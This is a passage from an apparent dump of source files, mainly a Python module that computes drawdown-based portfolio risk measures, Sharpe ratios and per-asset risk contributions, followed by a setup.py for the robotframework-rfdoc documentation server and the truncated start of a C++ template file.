\\text{ADD}(X) = \\frac{1}{T}\\sum_{j=0}^{T}\\left [ \\max_{t \\in (0,j)}\n \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i} \\right ]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n ADD of an uncumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = peak - i\n if DD > 0:\n value += DD\n n += 1\n if n == 0:\n value = 0\n else:\n value = value / (n - 1)\n\n value = np.array(value).item()\n\n return value\n\n\ndef DaR_Abs(X, alpha=0.05):\n r\"\"\"\n Calculate the Drawdown at Risk (DaR) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{DaR}_{\\alpha}(X) & = \\max_{j \\in (0,T)} \\left \\{ \\text{DD}(X,j)\n \\in \\mathbb{R}: F_{\\text{DD}} \\left ( \\text{DD}(X,j) \\right )< 1-\\alpha\n \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\sum_{i=0}^{t}X_{i}\n \\right )- \\sum_{i=0}^{j}X_{i}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of DaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n DaR of an uncumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i))\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n value = -sorted_DD[index]\n value = np.array(value).item()\n\n return value\n\n\ndef CDaR_Abs(X, alpha=0.05):\n r\"\"\"\n Calculate the Conditional Drawdown at Risk (CDaR) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{CDaR}_{\\alpha}(X) = \\text{DaR}_{\\alpha}(X) + \\frac{1}{\\alpha T}\n \\sum_{j=0}^{T} \\max \\left [ \\max_{t \\in (0,j)}\n \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i}\n - \\text{DaR}_{\\alpha}(X), 0 \\right ]\n\n Where:\n\n :math:`\\text{DaR}_{\\alpha}` is the Drawdown at Risk of an uncumpound\n cumulated return series :math:`X`.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of CDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n CDaR of an uncumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i))\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n sum_var = 0\n for i in range(0, index + 1):\n sum_var = sum_var + sorted_DD[i] - sorted_DD[index]\n value = -sorted_DD[index] - sum_var / (alpha * len(sorted_DD))\n value = np.array(value).item()\n\n return value\n\n\ndef EDaR_Abs(X, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Drawdown at Risk (EDaR) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{EDaR}_{\\alpha}(X) & = \\inf_{z>0} \\left \\{ z\n \\ln \\left (\\frac{M_{\\text{DD}(X)}(z^{-1})}{\\alpha} \\right ) \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\sum_{i=0}^{t}X_{i}\n \\right )- \\sum_{i=0}^{j}X_{i} \\\\\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of EDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n (value, z) : tuple\n EDaR of an uncumpounded cumulative returns series \n and value of z that minimize EDaR.\n \n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i))\n del DD[0]\n\n (value, t) = EVaR_Hist(np.array(DD), alpha=alpha)\n\n return (value, t)\n\n\ndef UCI_Abs(X):\n r\"\"\"\n Calculate the Ulcer Index (UCI) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{UCI}(X) =\\sqrt{\\frac{1}{T}\\sum_{j=0}^{T} \\left [ \\max_{t \\in\n (0,j)} \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i}\n \\right ] ^2}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Ulcer Index of an uncumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = peak - i\n if DD > 0:\n value += DD ** 2\n n += 1\n if n == 0:\n value = 0\n else:\n value = np.sqrt(value / (n - 1))\n\n value = np.array(value).item()\n\n return value\n\n\ndef MDD_Rel(X):\n r\"\"\"\n Calculate the Maximum Drawdown (MDD) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{MDD}(X) = \\max_{j \\in (0,T)}\\left[\\max_{t \\in (0,j)}\n \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right ) - \\prod_{i=0}^{j}(1+X_{i})\n \\right]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n MDD of a cumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n value = 0\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD = (peak - i) / peak\n if DD > value:\n value = DD\n\n value = np.array(value).item()\n\n return value\n\n\ndef ADD_Rel(X):\n r\"\"\"\n Calculate the Average Drawdown (ADD) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{ADD}(X) = \\frac{1}{T}\\sum_{j=0}^{T} \\left [ \\max_{t \\in (0,j)}\n \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right )- \\prod_{i=0}^{j}(1+X_{i})\n \\right ]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n ADD of a cumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = (peak - i) / peak\n if DD > 0:\n value += DD\n n += 1\n if n == 0:\n value = 0\n else:\n value = value / (n - 1)\n\n value = np.array(value).item()\n\n return value\n\n\ndef DaR_Rel(X, alpha=0.05):\n r\"\"\"\n Calculate the Drawdown at Risk (DaR) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{DaR}_{\\alpha}(X) & = \\max_{j \\in (0,T)} \\left \\{ \\text{DD}(X,j)\n \\in \\mathbb{R}: F_{\\text{DD}} \\left ( \\text{DD}(X,j) \\right )< 1 - \\alpha\n \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\prod_{i=0}^{t}(1+X_{i})\n \\right )- \\prod_{i=0}^{j}(1+X_{i})\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of DaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n DaR of a cumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"X must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i) / peak)\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n value = -sorted_DD[index]\n value = np.array(value).item()\n\n return value\n\n\ndef CDaR_Rel(X, alpha=0.05):\n r\"\"\"\n Calculate the Conditional Drawdown at Risk (CDaR) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{CDaR}_{\\alpha}(X) = \\text{DaR}_{\\alpha}(X) + \\frac{1}{\\alpha T}\n \\sum_{i=0}^{T} \\max \\left [ \\max_{t \\in (0,T)}\n \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right )- \\prod_{i=0}^{j}(1+X_{i})\n - \\text{DaR}_{\\alpha}(X), 0 \\right ]\n\n Where:\n\n :math:`\\text{DaR}_{\\alpha}` is the Drawdown at Risk of a cumpound\n cumulated return series :math:`X`.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of CDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n CDaR of a cumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"X must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i) / peak)\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n sum_var = 0\n for i in range(0, index + 1):\n sum_var = sum_var + sorted_DD[i] - sorted_DD[index]\n value = -sorted_DD[index] - sum_var / (alpha * len(sorted_DD))\n value = np.array(value).item()\n\n return value\n\n\ndef EDaR_Rel(X, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Drawdown at Risk (EDaR) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{EDaR}_{\\alpha}(X) & = \\inf_{z>0} \\left \\{ z\n \\ln \\left (\\frac{M_{\\text{DD}(X)}(z^{-1})}{\\alpha} \\right ) \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\prod_{i=0}^{t}(1+X_{i})\n \\right )- \\prod_{i=0}^{j}(1+X_{i})\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of EDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n (value, z) : tuple\n EDaR of a cumpounded cumulative returns series \n and value of z that minimize EDaR.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"X must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i) / peak)\n del DD[0]\n\n (value, t) = EVaR_Hist(np.array(DD), alpha=alpha)\n\n return (value, t)\n\n\ndef UCI_Rel(X):\n r\"\"\"\n Calculate the Ulcer Index (UCI) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{UCI}(X) =\\sqrt{\\frac{1}{T}\\sum_{j=0}^{T} \\left [ \\max_{t \\in\n (0,j)} \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right )- \\prod_{i=0}^{j}\n (1+X_{i}) \\right ] ^2}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Ulcer Index of a cumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = (peak - i) / peak\n if DD > 0:\n value += DD ** 2\n n += 1\n if n == 0:\n value = 0\n else:\n value = np.sqrt(value / (n - 1))\n\n value = np.array(value).item()\n\n return value\n\n\n###############################################################################\n# Risk Adjusted Return Ratios\n###############################################################################\n\n\ndef Sharpe_Risk(w, cov=None, returns=None, rm=\"MV\", rf=0, alpha=0.05):\n r\"\"\"\n Calculate the risk measure available on the Sharpe function.\n\n Parameters\n ----------\n w : DataFrame or 1d-array of shape (n_assets, 1)\n Weights matrix, where n_assets is the number of assets.\n cov : DataFrame or nd-array of shape (n_features, n_features)\n Covariance matrix, where n_features is the number of features.\n returns : DataFrame or nd-array of shape (n_samples, n_features)\n Features matrix, where n_samples is the number of samples and\n n_features is the number of features.\n rm : str, optional\n Risk measure used in the denominator of the ratio. The default is\n 'MV'. Posible values are:\n\n - 'MV': Standard Deviation.\n - 'MAD': Mean Absolute Deviation.\n - 'MSV': Semi Standard Deviation.\n - 'FLPM': First Lower Partial Moment (Omega Ratio).\n - 'SLPM': Second Lower Partial Moment (Sortino Ratio).\n - 'VaR': Value at Risk.\n - 'CVaR': Conditional Value at Risk.\n - 'EVaR': Entropic Value at Risk.\n - 'WR': Worst Realization (Minimax)\n - 'MDD': Maximum Drawdown of uncompounded cumulative returns (Calmar Ratio).\n - 'ADD': Average Drawdown of uncompounded cumulative returns.\n - 'DaR': Drawdown at Risk of uncompounded cumulative returns.\n - 'CDaR': Conditional Drawdown at Risk of uncompounded cumulative returns.\n - 'EDaR': Entropic Drawdown at Risk of uncompounded cumulative returns.\n - 'UCI': Ulcer Index of uncompounded cumulative returns.\n - 'MDD_Rel': Maximum Drawdown of compounded cumulative returns (Calmar Ratio).\n - 'ADD_Rel': Average Drawdown of compounded cumulative returns.\n - 'CDaR_Rel': Conditional Drawdown at Risk of compounded cumulative returns.\n - 'EDaR_Rel': Entropic Drawdown at Risk of compounded cumulative returns.\n - 'UCI_Rel': Ulcer Index of compounded cumulative returns.\n\n rf : float, optional\n Risk free rate. The default is 0.\n alpha : float, optional\n Significance level of VaR, CVaR, EDaR, DaR, CDaR and EDaR.\n The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Risk measure of the portfolio.\n\n \"\"\"\n\n w_ = np.array(w, ndmin=2)\n if w_.shape[0] == 1 and w_.shape[1] > 1:\n w_ = w_.T\n if w_.shape[0] > 1 and w_.shape[1] > 1:\n raise ValueError(\"weights must have n_assets x 1 size\")\n\n if cov is not None:\n cov_ = np.array(cov, ndmin=2)\n if returns is not None:\n returns_ = np.array(returns, ndmin=2)\n\n a = returns_ @ w_\n if rm == \"MV\":\n risk = w_.T @ cov_ @ w_\n risk = np.sqrt(risk.item())\n elif rm == \"MAD\":\n risk = MAD(a)\n elif rm == \"MSV\":\n risk = SemiDeviation(a)\n elif rm == \"FLPM\":\n risk = LPM(a, MAR=rf, p=1)\n elif rm == \"SLPM\":\n risk = LPM(a, MAR=rf, p=2)\n elif rm == \"VaR\":\n risk = VaR_Hist(a, alpha=alpha)\n elif rm == \"CVaR\":\n risk = CVaR_Hist(a, alpha=alpha)\n elif rm == \"EVaR\":\n risk = EVaR_Hist(a, alpha=alpha)[0]\n elif rm == \"WR\":\n risk = WR(a)\n elif rm == \"MDD\":\n risk = MDD_Abs(a)\n elif rm == \"ADD\":\n risk = ADD_Abs(a)\n elif rm == \"DaR\":\n risk = DaR_Abs(a, alpha=alpha)\n elif rm == \"CDaR\":\n risk = CDaR_Abs(a, alpha=alpha)\n elif rm == \"EDaR\":\n risk = EDaR_Abs(a, alpha=alpha)[0]\n elif rm == \"UCI\":\n risk = UCI_Abs(a)\n elif rm == \"MDD_Rel\":\n risk = MDD_Rel(a)\n elif rm == \"ADD_Rel\":\n risk = ADD_Rel(a)\n elif rm == \"DaR_Rel\":\n risk = DaR_Rel(a, alpha=alpha)\n elif rm == \"CDaR_Rel\":\n risk = CDaR_Rel(a, alpha=alpha)\n elif rm == \"EDaR_Rel\":\n risk = EDaR_Rel(a, alpha=alpha)[0]\n elif rm == \"UCI_Rel\":\n risk = UCI_Rel(a)\n value = risk\n\n return value\n\n\ndef Sharpe(w, mu, cov=None, returns=None, rm=\"MV\", rf=0, alpha=0.05):\n r\"\"\"\n Calculate the Risk Adjusted Return Ratio from a portfolio returns series.\n\n .. math::\n \\text{Sharpe}(X) = \\frac{\\mathbb{E}(X) -\n r_{f}}{\\phi(X)}\n\n Where:\n\n :math:`X` is the vector of portfolio returns.\n\n :math:`r_{f}` is the risk free rate, when the risk measure is\n\n :math:`\\text{LPM}` uses instead of :math:`r_{f}` the :math:`\\text{MAR}`.\n\n :math:`\\phi(X)` is a convex risk measure. The risk measures availabe are:\n\n Parameters\n ----------\n\n w : DataFrame or 1d-array of shape (n_assets, 1)\n Weights matrix, where n_assets is the number of assets.\n mu : DataFrame or nd-array of shape (1, n_assets)\n Vector of expected returns, where n_assets is the number of assets.\n cov : DataFrame or nd-array of shape (n_features, n_features)\n Covariance matrix, where n_features is the number of features.\n returns : DataFrame or nd-array of shape (n_samples, n_features)\n Features matrix, where n_samples is the number of samples and\n n_features is the number of features.\n rm : str, optional\n Risk measure used in the denominator of the ratio. The default is\n 'MV'. Posible values are:\n\n - 'MV': Standard Deviation.\n - 'MAD': Mean Absolute Deviation.\n - 'MSV': Semi Standard Deviation.\n - 'FLPM': First Lower Partial Moment (Omega Ratio).\n - 'SLPM': Second Lower Partial Moment (Sortino Ratio).\n - 'VaR': Value at Risk.\n - 'CVaR': Conditional Value at Risk.\n - 'EVaR': Entropic Value at Risk.\n - 'WR': Worst Realization (Minimax)\n - 'MDD': Maximum Drawdown of uncompounded cumulative returns (Calmar Ratio).\n - 'ADD': Average Drawdown of uncompounded cumulative returns.\n - 'DaR': Drawdown at Risk of uncompounded cumulative returns.\n - 'CDaR': Conditional Drawdown at Risk of uncompounded cumulative returns.\n - 'EDaR': Entropic Drawdown at Risk of uncompounded cumulative returns.\n - 'UCI': Ulcer Index of uncompounded cumulative returns.\n - 'MDD_Rel': Maximum Drawdown of compounded cumulative returns (Calmar Ratio).\n - 'ADD_Rel': Average Drawdown of compounded cumulative returns.\n - 'CDaR_Rel': Conditional Drawdown at Risk of compounded cumulative returns.\n - 'EDaR_Rel': Entropic Drawdown at Risk of compounded cumulative returns.\n - 'UCI_Rel': Ulcer Index of compounded cumulative returns.\n\n rf : float, optional\n Risk free rate. The default is 0.\n alpha : float, optional\n Significance level of VaR, CVaR, EDaR, DaR, CDaR and EDaR.\n The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Risk adjusted return ratio of :math:`X`.\n\n \"\"\"\n\n w_ = np.array(w, ndmin=2)\n if w_.shape[0] == 1 and w_.shape[1] > 1:\n w_ = w_.T\n if w_.shape[0] > 1 and w_.shape[1] > 1:\n raise ValueError(\"weights must have n_assets x 1 size\")\n\n if cov is None and rm == \"MV\":\n raise ValueError(\"covariance matrix is necessary to calculate the sharpe ratio\")\n elif returns is None and rm != \"MV\":\n raise ValueError(\n \"returns scenarios are necessary to calculate the sharpe ratio\"\n )\n\n mu_ = np.array(mu, ndmin=2)\n\n if cov is not None:\n cov_ = np.array(cov, ndmin=2)\n if returns is not None:\n returns_ = np.array(returns, ndmin=2)\n\n ret = mu_ @ w_\n ret = ret.item()\n\n risk = Sharpe_Risk(w, cov=cov_, returns=returns_, rm=rm, rf=rf, alpha=alpha)\n\n value = (ret - rf) / risk\n\n return value\n\n\n###############################################################################\n# Risk Contribution Vectors\n###############################################################################\n\n\ndef Risk_Contribution(w, cov=None, returns=None, rm=\"MV\", rf=0, alpha=0.05):\n r\"\"\"\n Calculate the risk contribution for each asset based on the risk measure\n selected.\n\n Parameters\n ----------\n w : DataFrame or 1d-array of shape (n_assets, 1)\n Weights matrix, where n_assets is the number of assets.\n cov : DataFrame or nd-array of shape (n_features, n_features)\n Covariance matrix, where n_features is the number of features.\n returns : DataFrame or nd-array of shape (n_samples, n_features)\n Features matrix, where n_samples is the number of samples and\n n_features is the number of features.\n rm : str, optional\n Risk measure used in the denominator of the ratio. The default is\n 'MV'. Posible values are:\n\n - 'MV': Standard Deviation.\n - 'MAD': Mean Absolute Deviation.\n - 'MSV': Semi Standard Deviation.\n - 'FLPM': First Lower Partial Moment (Omega Ratio).\n - 'SLPM': Second Lower Partial Moment (Sortino Ratio).\n - 'VaR': Value at Risk.\n - 'CVaR': Conditional Value at Risk.\n - 'EVaR': Entropic Value at Risk.\n - 'WR': Worst Realization (Minimax)\n - 'MDD': Maximum Drawdown of uncompounded cumulative returns (Calmar Ratio).\n - 'ADD': Average Drawdown of uncompounded cumulative returns.\n - 'DaR': Drawdown at Risk of uncompounded cumulative returns.\n - 'CDaR': Conditional Drawdown at Risk of uncompounded cumulative returns.\n - 'EDaR': Entropic Drawdown at Risk of uncompounded cumulative returns.\n - 'UCI': Ulcer Index of uncompounded cumulative returns.\n - 'MDD_Rel': Maximum Drawdown of compounded cumulative returns (Calmar Ratio).\n - 'ADD_Rel': Average Drawdown of compounded cumulative returns.\n - 'CDaR_Rel': Conditional Drawdown at Risk of compounded cumulative returns.\n - 'EDaR_Rel': Entropic Drawdown at Risk of compounded cumulative returns.\n - 'UCI_Rel': Ulcer Index of compounded cumulative returns.\n\n rf : float, optional\n Risk free rate. The default is 0.\n alpha : float, optional\n Significance level of VaR, CVaR, EDaR, DaR, CDaR and EDaR.\n The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Risk measure of the portfolio.\n\n \"\"\"\n\n w_ = np.array(w, ndmin=2)\n if w_.shape[0] == 1 and w_.shape[1] > 1:\n w_ = w_.T\n if w_.shape[0] > 1 and w_.shape[1] > 1:\n raise ValueError(\"weights must have n_assets x 1 size\")\n\n if cov is not None:\n cov_ = np.array(cov, ndmin=2)\n if returns is not None:\n returns_ = np.array(returns, ndmin=2)\n\n RC = []\n d_i = 0.0000001\n\n for i in range(0, w_.shape[0]):\n delta = np.zeros((w_.shape[0], 1))\n delta[i, 0] = d_i\n w_1 = w_ + delta\n w_2 = w_ - delta\n a_1 = returns_ @ w_1\n a_2 = returns_ @ w_2\n if rm == \"MV\":\n risk_1 = w_1.T @ cov_ @ w_1\n risk_1 = np.sqrt(risk_1.item())\n risk_2 = w_2.T @ cov_ @ w_2\n risk_2 = np.sqrt(risk_2.item())\n elif rm == \"MAD\":\n risk_1 = MAD(a_1)\n risk_2 = MAD(a_2)\n elif rm == \"MSV\":\n risk_1 = SemiDeviation(a_1)\n risk_2 = SemiDeviation(a_2)\n elif rm == \"FLPM\":\n risk_1 = LPM(a_1, MAR=rf, p=1)\n risk_2 = LPM(a_2, MAR=rf, p=1)\n elif rm == \"SLPM\":\n risk_1 = LPM(a_1, MAR=rf, p=2)\n risk_2 = LPM(a_2, MAR=rf, p=2)\n elif rm == \"VaR\":\n risk_1 = VaR_Hist(a_1, alpha=alpha)\n risk_2 = VaR_Hist(a_2, alpha=alpha)\n elif rm == \"CVaR\":\n risk_1 = CVaR_Hist(a_1, alpha=alpha)\n risk_2 = CVaR_Hist(a_2, alpha=alpha)\n elif rm == \"EVaR\":\n risk_1 = EVaR_Hist(a_1, alpha=alpha)[0]\n risk_2 = EVaR_Hist(a_2, alpha=alpha)[0]\n elif rm == \"WR\":\n risk_1 = WR(a_1)\n risk_2 = WR(a_2)\n elif rm == \"MDD\":\n risk_1 = MDD_Abs(a_1)\n risk_2 = MDD_Abs(a_2)\n elif rm == \"ADD\":\n risk_1 = ADD_Abs(a_1)\n risk_2 = ADD_Abs(a_2)\n elif rm == \"DaR\":\n risk_1 = DaR_Abs(a_1, alpha=alpha)\n risk_2 = DaR_Abs(a_2, alpha=alpha)\n elif rm == \"CDaR\":\n risk_1 = CDaR_Abs(a_1, alpha=alpha)\n risk_2 = CDaR_Abs(a_2, alpha=alpha)\n elif rm == \"EDaR\":\n risk_1 = EDaR_Abs(a_1, alpha=alpha)[0]\n risk_2 = EDaR_Abs(a_2, alpha=alpha)[0]\n elif rm == \"UCI\":\n risk_1 = UCI_Abs(a_1)\n risk_2 = UCI_Abs(a_2)\n elif rm == \"MDD_Rel\":\n risk_1 = MDD_Rel(a_1)\n risk_2 = MDD_Rel(a_2)\n elif rm == \"ADD_Rel\":\n risk_1 = ADD_Rel(a_1)\n risk_2 = ADD_Rel(a_2)\n elif rm == \"DaR_Rel\":\n risk_1 = DaR_Rel(a_1, alpha=alpha)\n risk_2 = DaR_Rel(a_2, alpha=alpha)\n elif rm == \"CDaR_Rel\":\n risk_1 = CDaR_Rel(a_1, alpha=alpha)\n risk_2 = CDaR_Rel(a_2, alpha=alpha)\n elif rm == \"EDaR_Rel\":\n risk_1 = EDaR_Rel(a_1, alpha=alpha)[0]\n risk_2 = EDaR_Rel(a_2, alpha=alpha)[0]\n elif rm == \"UCI_Rel\":\n risk_1 = UCI_Rel(a_1)\n risk_2 = UCI_Rel(a_2)\n\n RC_i = (risk_1 - risk_2) / (2 * d_i) * w_[i, 0]\n RC.append(RC_i)\n\n RC = np.array(RC, ndmin=1)\n\n return RC\n"} {"ext": "py", "sha": "1a2ed91e678357e837cc805b58d9cba55a2abf29", "content": "#!/usr/bin/env python\n\ntry:\n from setuptools import setup\n requires = {\n 'install_requires': ['django >= 4.0'],\n }\nexcept ImportError:\n from distutils.core import setup\n requires = {}\n\nfrom os.path import abspath, dirname, join\n\nwith open(join(dirname(abspath(__file__)), 'src', 'rfdoc', 'version.py')) as f:\n exec(f.read())\n\n# Maximum width in Windows installer seems to be 70 characters -------|\nDESCRIPTION = \"\"\"\nRFDoc is a web application for storing and searching Robot Framework\ntest library and resource file documentations.\n\nRequired packages:\n django >= 4.0\n\"\"\"[1:-1]\n\nCLASSIFIERS = \"\"\"\nDevelopment Status :: 5 - Production/Stable\nLicense :: OSI Approved :: Apache Software License\nOperating System :: OS Independent\nProgramming Language :: Python\nTopic :: Software Development :: Testing\n\"\"\"[1:-1]\n\nsetup(\n name = 'robotframework-rfdoc',\n version = VERSION,\n description = 'Web-based Robot Framework library documentation server',\n long_description = DESCRIPTION,\n author = 'Robot Framework Developers',\n author_email = 'robotframework-devel@googlegroups.com',\n url = 'http://code.google.com/p/rfdoc/',\n license = 'Apache License 2.0',\n keywords = 'robotframework testing testautomation documentation',\n platforms = 'any',\n classifiers = CLASSIFIERS.splitlines(),\n package_dir = {'rfdoc': 'src/rfdoc'},\n packages = ['rfdoc', 'rfdoc.rfdocapp', 'rfdoc.rfdocapp.views',\n 'rfdoc.rfdocapp.templatetags', 'rfdoc.rfdocapp.utils'],\n package_data = {'rfdoc': ['*.tmpl', 'rfdocapp/templates/*.html',\n 'rfdocapp/static/*.css',\n 'rfdocapp/static/*.js']},\n **requires\n)\n"} {"ext": "py", "sha": "1a2ed92f3415b527cd451de99a65af6710e9de8e", "content": "text = \"\"\"\n//------------------------------------------------------------------------------\n// Explicit instantiation.\n//------------------------------------------------------------------------------\n#include \"Geometry/Dimension.hh\"\n#include 